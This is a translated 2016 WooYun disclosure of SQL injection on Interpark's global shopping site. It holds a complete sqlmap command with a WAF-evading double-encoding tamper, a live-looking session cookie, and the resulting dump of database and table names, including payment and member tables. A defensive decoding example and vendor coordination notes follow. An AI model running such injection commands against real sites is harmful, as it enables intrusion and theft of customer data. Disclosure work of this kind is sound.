
Vulnerability summary

Defect ID: wooyun-2016-0204435

Title: Interpark, Korea's largest domestic e-commerce site, has SQL injection on its global site / main site (9 databases, many tables, double encoding, WAF present, UNION possible)

Vendor: globalinterpark.com

Author: hear7v

Submitted: 2016-05-04 17:08

Fixed: 2016-06-20 17:40

Published: 2016-06-20 17:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-05-04: Details sent to the vendor, awaiting the vendor's handling
2016-05-06: Vendor confirmed; details disclosed only to the vendor
2016-05-16: Details disclosed to core white hats and domain experts
2016-05-26: Details disclosed to regular white hats
2016-06-05: Details disclosed to intern white hats
2016-06-20: Details disclosed to the public

Brief description:

Submitted in the afternoon, but no data came out. After analysing the traffic I found the original traffic was double-encoded; after applying a tamper script the data came out. I am not familiar with Korean database names, so I did not probe specific data.

Details:

python sqlmap.py -u "http://**.**.**.**/product/Api.do?_method=getNewOption&callback=jQuery111106387168327488439_1462148731058&PRD_NO=4020676593&OPT_TP=01&OPT_NM1=%25EC%2584%25A0%25ED%2583%259D1&_=1462148731059" --user-agent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" --cookie "wingState=visible; ipzone=HK; city=Central District; CURRENCY=cny; lang=zh_CN; tiemzone=9; _gat=1; IPCODE=003; interparkstamp_global=1308199864190577841264109964981971; LANGUAGE=zh-cn; igfsTodayViewPrdNo=4020676593; igfsTodayViewImg=/goods_image/6/5/9/3/4020676593i.jpg; igfsTodayViewAge=0; JSESSIONID=lQ5uADDlvsvop1Ps44WS73oeA64Aa2wJzaVuUkIhdyMWIr33QJf7GbO15oUWqUfW; _ga=GA1.2.449814888.1462148585" --time-sec=3 --tamper chardoubleencode.py

Proof of vulnerability:

[21:48:42] [DEBUG] performed 0 queries in 0.02 seconds
available databases [9]:
[*] ADM
[*] APEX_030200
[*] CBT
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] XDB
[21:48:42] [INFO] fetching tables for databases: 'ADM, APEX_030200, CBT, CTXSYS, EXFSYS, MDSYS, SYS, SYSTEM, XDB'
[21:48:42] [DEBUG] performed 0 queries in 0.12 seconds
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: XDB
[2 tables]
+--------------------------------+
| XDB$IMPORT_TT_INFO |
| XDB$XIDX_IMP_T |
+--------------------------------+
Database: APEX_030200
[3 tables]
+--------------------------------+
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+--------------------------------+
Database: SYSTEM
[4 tables]
+--------------------------------+
| HELP |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[26 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| DATA_PUMP_XPL_TABLE$ |
| HS$_PARALLEL_METADATA |
| HS_BULKLOAD_VIEW_OBJ |
| HS_PARTITION_COL_NAME |
| HS_PARTITION_COL_TYPE |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| KU$XKTFBUE |
| KU$_DATAPUMP_MASTER_10_1 |
| KU$_DATAPUMP_MASTER_11_1 |
| KU$_DATAPUMP_MASTER_11_1_0_7 |
| KU$_DATAPUMP_MASTER_11_2 |
| KU$_LIST_FILTER_TEMP |
| KU$_LIST_FILTER_TEMP_2 |
| ODCI_PMO_ROWIDS$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
| WRR$_REPLAY_CALL_FILTER |
+--------------------------------+
Database: MDSYS
[35 tables]
+--------------------------------+
| NTV2_XML_DATA |
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_FEATURE_USAGE |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
| SRSNAMESPACE_TABLE |
+--------------------------------+
Database: CBT
[5 tables]
+--------------------------------+
| PLAN_TABLE |
| TEMP_CBT |
| TMP_GLOBAL_LOGIN_CNT_20150226 |
| TMP_GLOBAL_LOGIN_CNT_20150522 |
| TRACE |
+--------------------------------+
Database: ADM
[166 tables]
+--------------------------------+
| BANNER_CONTENT |
| BANNER_GROUP_MASTER |
| BANNER_GROUP_MEMBER |
| BANNER_ITEM |
| BANNER_ITEM_HTML |
| BEST_USED_WRITTEN |
| BEST_USED_WRITTEN_ADMIN |
| BOARD |
| BOARD_DTL |
| B_WORK1 |
| B_WORK2 |
| CARD_PAYMENT |
| CARD_PAYMENT_HIS |
| CART |
| CATEGORY_ADDINFO_MGT |
| CBT_CONTB_PROFIT_CODE |
| CBT_TRANS_INFO |
| CLM_REQUEST |
| CLM_REQUESTDTL |
| CODE_DETAIL |
| CODE_MASTER |
| CONTENT_RECOMMEND |
| CONTENT_REPORT |
| COPY_T |
| COUNTRY_MAP |
| COUPON |
| COUPON_CBT_COND |
| COUPON_CBT_PBLCT |
| COUPON_EXCEPT_PRD |
| COUPON_RANDOM |
| D2D_PRODUCT_PARCEL_TAX |
| D2D_WEIGHT_SHIPPING_FEE |
| DELVWH_ORDER |
| DISPLAY_MENU |
| ENTR_ANTI_MEMBER |
| EVENT |
| EVENT_FREECODE |
| EXCHANGE_RATE |
| EX_ORDER_INFO |
| FAQ |
| FAQ_DTL |
| FAVORITE_ENTR |
| FREECODE_EVENT |
| FREEDELV_EXCEPTION |
| IGS_MENU |
| IGS_MENU_AUTH |
| IGS_USER |
| IGS_USER_AUTHORITY |
| IGS_USER_GROUP |
| IGS_USER_GROUP_AUTH |
| ILS_DELVWH_ORDER |
| ILS_DELVWH_ORDERPRD |
| ILS_DELV_INVOICE |
| ILS_ORD_UPDPROC |
| ILS_RTN_PRD |
| INICIS_PAY_INFO |
| INPAK_DLV_INF |
| INQUIRY |
| INQUIRY_REPLY |
| IPP_MALL_INFO |
| IPP_MALL_TRACE |
| IPP_VISIT_DDSUM |
| LANGCODE_TAG |
| LANGCODE_TAG2VALUE |
| LANGCODE_VALUE |
| LOG |
| LOGIN_SESSION |
| MAIL_SEND_HISTORY |
| MD_ORDERDTL_BUYCONFIRM |
| MEMBER_GLOBAL |
| MEMBER_GLOBAL_TEMP |
| MENU |
| MILEAGE_UNAVAILABLE |
| ORDERCLM |
| ORDERCLMDTL |
| ORDERCLMDTL_DISCOUNT |
| ORDERCLMDTL_ENTR |
| ORDERCLMDTL_STATUS_HIS |
| ORDERCLMDTL_STORE |
| ORDERCLM_ACCESS_INFO |
| ORDERCLM_CRTTP_PRCS |
| ORDERCLM_DELV |
| ORDERCLM_DELVAMT |
| ORDERCLM_DELV_COUPON |
| ORDERCLM_DELV_PLACE |
| ORDERCLM_DELV_PLACE_BASIC |
| ORDERCLM_DELV_WEIGHT |
| ORDERCLM_EOD |
| ORDERCLM_EXCEPTION |
| ORDERCLM_MISS_DELV |
| ORDERCLM_PRODUCT_HIS |
| ORDERCLM_STATUS_HIS |
| ORDER_RELEASE_LIMIT |
| ORDPAYMENT_REFUND |
| ORDPAYMENT_REFUND_DTL |
| RESTAPI_MALL_INFO |
| RESTAPI_PRODUCT_SET |
| RESTAPI_WHITE_LIST |
| REVIEW_SCRAP |
| REV_CARD_PAYMENT_DDSUM |
| REV_DELVAMT_DDSUM |
| REV_DIFF_HST |
| REV_DIFF_RSN |
| REV_EXT_DDSUM |
| REV_IPOINT_DDSUM |
| REV_ORDCLMDTL_ORG_SUM |
| REV_ORDCLMDTL_SUM |
| REV_ORDCLM_EXPENSE_SUM |
| REV_ORDPAYMENT_REFUND_SUM |
| REV_PAY_LOG |
| REV_PRCS_HST |
| REV_SETL_DELVAMT_LOG |
| REV_SETL_PRD_LOG_CBT |
| ROULETTE_ACC_HIS |
| ROULETTE_RANK |
| ROULETTE_RANK_TP |
| SERVICE_USED_WRITTEN |
| SERVICE_USED_WRITTEN_DTL |
| TEMP_PRODUCT_KTY2 |
| TENPAY_PAYMENT |
| TENPAY_PAYMENT_AUTH |
| TENPAY_PAYMENT_HIS |
| TMP_CLAIM |
| TMP_T_IP_CITY |
| TMP_T_LOCATION |
| TOAD_PLAN_TABLE |
| TRULY_COMMENT |
| TRUNCATE_TAB_LIST |
| TRY_CBT_TRANS_INFO |
| TRY_ORD |
| TRY_ORDDELV_PLACE |
| TRY_ORDDTL_DISCOUNT |
| TRY_ORD_DELVAMT |
| TRY_ORD_DELV_COUPON |
| TRY_ORD_DTL |
| TRY_PAYMENT |
| TTT |
| T_IP_CITY |
| T_LOCATION |
| USED_WRITTEN_ADDINFO |
| USED_WRITTEN_MEMBER_01 |
| USED_WRITTEN_PRODUCT_01 |
| USED_WRITTEN_REPLY |
| WORK_CALENDAR |
| ZZIM_CNT |
| ZZIM_LIST |
+--------------------------------+
Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| DR$THS |
| DR$THS_PHRASE |
+--------------------------------+

Fix:

Filter the input.
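The description above notes that the site's parameters are double URL-encoded (the OPT_NM1 value in the sqlmap command only becomes readable text after two percent-decoding passes), so a filter that decodes once never sees the characters that reach the database. As an added example, not code from the original report, the Python below normalizes each query parameter by decoding until it stops changing and flags SQL metacharacters in the fully decoded value; the REPORTED_QUERY is the query string from the report's command, and PROBE_QUERY is a constructed variant carrying a double-encoded quote.

```python
from urllib.parse import unquote

# Constructed inputs for this example: the query string from the report's
# sqlmap command (host omitted), and a constructed variant whose OPT_NM1
# carries a double-encoded single quote (%2527 -> %27 -> ').
REPORTED_QUERY = ("_method=getNewOption&callback=jQuery111106387168327488439_1462148731058"
                  "&PRD_NO=4020676593&OPT_TP=01&OPT_NM1=%25EC%2584%25A0%25ED%2583%259D1"
                  "&_=1462148731059")
PROBE_QUERY = "_method=getNewOption&PRD_NO=4020676593&OPT_NM1=%25EC%2584%25A0%2527"

MAX_DECODE_PASSES = 3              # cap so a pathological value cannot loop forever
SQL_METACHARS = ("'", '"', "--", "/*", ";")

def decode_until_stable(raw):
    """Percent-decode repeatedly until the value stops changing.
    Returns (decoded_value, passes); passes == 2 is the double-encoded case."""
    current, passes = raw, 0
    while passes < MAX_DECODE_PASSES:
        decoded = unquote(current)
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current, passes

def split_query(query):
    """Split the raw query string without decoding anything, so the encoding
    depth of each value is preserved (parse_qs would already strip one layer)."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs

def inspect_query(query):
    """Return {param: (decoded_value, passes, flagged)}; flagged means SQL
    metacharacters are present once the value is fully decoded."""
    result = {}
    for key, raw in split_query(query):
        value, passes = decode_until_stable(raw)
        result[key] = (value, passes, any(tok in value for tok in SQL_METACHARS))
    return result

def visible_after_one_pass(raw):
    """What a filter that percent-decodes only once would inspect."""
    return unquote(raw)

if __name__ == "__main__":
    for name, query in (("reported", REPORTED_QUERY), ("probe", PROBE_QUERY)):
        for key, (value, passes, flagged) in inspect_query(query).items():
            print(f"{name} {key}: {value!r} passes={passes} flagged={flagged}")
```

Running it shows that OPT_NM1 in the reported request is plain Korean text ("선택1") reached after two passes, while the probe's quote is invisible after a single decode and only appears once the value is normalized to a fixed point.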

Copyright notice: reproduction must credit the source, hear7v@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2016-05-06 17:38

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded by CNCERT to KRCERT, which will coordinate handling with the website's operating organization.

Latest status:

None yet


Comments:

  1. 2016-05-04 17:23 | mango ( Core white hat | Rank:2145 Vulnerabilities:312 | The first step to solving a problem is admitting it exists. )

    First!

  2. 2016-05-05 16:24 | hear7v ( Regular white hat | Rank:175 Vulnerabilities:26 | Looking for a team to take me in )

    @mango memeda

  3. 2016-05-07 16:09 | hear7v ( Regular white hat | Rank:175 Vulnerabilities:26 | Looking for a team to take me in )

    @xsser Can I apply for a certificate for this one? It feels so low.